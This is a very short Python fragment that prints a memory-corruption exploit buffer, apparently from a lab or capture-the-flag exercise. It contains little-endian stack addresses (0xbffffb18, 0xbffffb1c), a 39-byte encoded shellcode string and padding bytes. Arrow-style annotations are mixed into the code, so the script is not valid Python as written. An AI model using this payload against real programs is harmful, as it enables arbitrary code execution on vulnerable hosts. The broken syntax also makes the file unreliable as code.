#!/usr/bin/python
print("\x38\xdb\xdf\x9f" + 18fbffbf --> bffffb18
	"\x3c\xdb\xdf\x9f" + 1cfbffbf --> bffffb1c
	"\xff\xff\xff\xff" + dfdfdfdf
	 39 byte shellcode-->"\x4a\x11\x78\xed\xa0\xa9\xe3\xa9\xe1\x4a\x66\x78\xed\xa0\x11\xe0\x70\x48\x0f\x0f\x53\x48\x48\x0f\x42\x49\x4e\x74\x7b\x70\x73\xa9\xc1\x11\xf2\x90\x2b\xed\xa0" + 
	"\xff\xff\xff\xff"
	"\xff\xff\xff\xff"
	"\xff\xff\xff\xff" --> 12 byte
	"\xff\x30") 10 --> 2byte
